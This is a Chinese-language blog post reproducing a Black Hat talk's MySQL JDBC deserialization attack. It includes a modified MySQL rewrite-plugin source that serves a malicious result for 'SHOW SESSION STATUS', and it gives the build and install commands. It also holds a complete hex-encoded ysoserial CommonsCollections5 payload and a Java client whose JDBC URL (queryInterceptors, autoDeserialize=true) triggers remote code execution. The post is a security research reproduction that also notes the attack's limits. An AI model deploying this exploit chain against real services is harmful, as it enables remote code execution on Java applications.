https://www.blackhat.com/eu-19/briefings/schedule/index.html#new-exploit-technique-in-java-deserialization-attack-17321
https://www.cnblogs.com/Welk1n/p/12056097.html
blackhat中的议题,对其中的mysql jdbc驱动反序列化漏洞进行了一下复现。
漏洞利用需要控制SQL查询语句"SHOW SESSION STATUS"的返回结果,以便于在后续的getObject方法调用时触发反序列化。本文通过mysql查询重写功能,将sql客户端发起的查询语句“SHOW SESSION STATUS”重写为我们自定义的sql语句,就能控制sql执行返回结果。由于mysql的rewriter插件好像不支持show语句重写,需要修改源码自己实现一下。
1.编译rewrite_example插件
编译环境是Ubuntu 18.04,mysql-community-5.7.28
apt-get install lsb-release gnupg libterm-ui-perl wget
wget https://dev.mysql.com/get/mysql-apt-config_0.8.14-1_all.deb
dpkg -i mysql-apt-config_0.8.14-1_all.deb
apt-get update
apt-get install mysql-community-server libmysqld-dev libmysqlclient-dev
apt-get build-dep mysql-community-server
apt-get source mysql-community
cd /root/mysql-community-5.7.28/plugin/rewrite_example
编辑mysql-community-5.7.28/plugin/rewrite_example/rewrite_example.cc修改其中rewrite_lower函数:
static int rewrite_lower(MYSQL_THD thd, mysql_event_class_t event_class,
const void *event)
{
if (event_class == MYSQL_AUDIT_PARSE_CLASS)
{
const struct mysql_event_parse *event_parse=
static_cast<const struct mysql_event_parse *>(event);
if (event_parse->event_subclass == MYSQL_AUDIT_PARSE_PREPARSE)
{
if (strcasecmp(std::string(event_parse->query.str).c_str(),"SHOW SESSION STATUS")==0) //判断当前执行sql语句,重写 SHOW SESSION STATUS
{
char sql[] = "select id,obj from ceshi.objs"; //替换为我们的语句
char *rewritten_query=
static_cast<char *>(my_malloc(key_memory_rewrite_example,
strlen(sql) + 1, MYF(0)));
for (unsigned i= 0; i < strlen(sql) + 1; i++) {
rewritten_query[i]= sql[i];
}
event_parse->rewritten_query->str=rewritten_query;
event_parse->rewritten_query->length=strlen(sql)+1;
*((int *)event_parse->flags)|=
(int)MYSQL_AUDIT_PARSE_REWRITE_PLUGIN_QUERY_REWRITTEN;
}
}
}
return 0;
}
编译插件:
gcc -shared -Wall -fPIC -o /usr/lib/mysql/plugin/rewrite_example.so rewrite_example.cc -I/root/mysql-community-5.7.28/include $(mysql_config --cflags) $(mysql_config --libmysqld-libs) -DMYSQL_DYNAMIC_PLUGIN -lmysqlservices
2.安装插件
启动mysql
service mysql start
登录mysql server,安装插件:
INSTALL PLUGIN rewrite_example SONAME 'rewrite_example.so';
3.payload准备
执行SQL:
create database if not exists ceshi;
create table if not exists ceshi.objs(id int, obj blob);
set @a=0xaced00057372002e6a617661782e6d616e6167656d656e742e42616441747472696275746556616c7565457870457863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176612f6c616e672f4f626a6563743b787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573736167657400124c6a6176612f6c616e672f537472696e673b5b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b787071007e0008707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007870000000037372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00054c000866696c654e616d6571007e00054c000a6d6574686f644e616d6571007e000578700000004a74002679736f73657269616c2e7061796c6f6164732e436f6d6d6f6e73436f6c6c656374696f6e7335740018436f6d6d6f6e73436f6c6c656374696f6e73352e6a6176617400096765744f626a6563747371007e000b0000002d71007e000d71007e000e71007e000f7371007e000b0000002674001979736f73657269616c2e47656e65726174655061796c6f616474001447656e65726174655061796c6f61642e6a6176617400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e00077872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000007704000000007871007e001a78737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b657971007e00014c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00017870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e003200000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e00327371007e002b7571007e002f00000002707571007e002f00000000740006696e766f6b657571007e003200000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e002f7371007e002b757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000463616c63740004657865637571007e00320000000171007e00377371007e0027737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878;
insert into ceshi.objs select 1,@a;
测试下插件
执行SHOW SESSION STATUS返回的是payload,所以乱码。payload是ysoserial的CommonsCollections5, 执行命令calc弹个计算器。
4.本地测试
import java.sql.*;
public class JDBCTest {
public static void main(String[] args){
String driver = "com.mysql.cj.jdbc.Driver";
String url = "jdbc:mysql://127.0.0.1:3306/mysql?characterEncoding=utf8&useSSL=false&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true";
String user = "root";
String password = "123";
try {
Class.forName(driver);
Connection conn = DriverManager.getConnection(url, user, password);
} catch(Exception e) {
e.printStackTrace();
}
}
}
java -cp .;mysql-connector-java-8.0.11.jar;commons-collections-3.2.1.jar JDBCTest
成功弹出计算器。
不过这个利用起来有点鸡肋:
1、可控的JDBC URL
2、queryInterceptors参数是mysql-connector-java-8.0.7版本才开始支持的
3、环境中有可用的Gadget
另外mysql-connector-java-5.1版本有一个statementInterceptors也能利用,不过触发点不是在创建connection的时候,而是Statement对象执行sql时触发,也有点鸡肋。
https://dev.mysql.com/doc/connector-j/5.1/en/connector-j-interceptors.html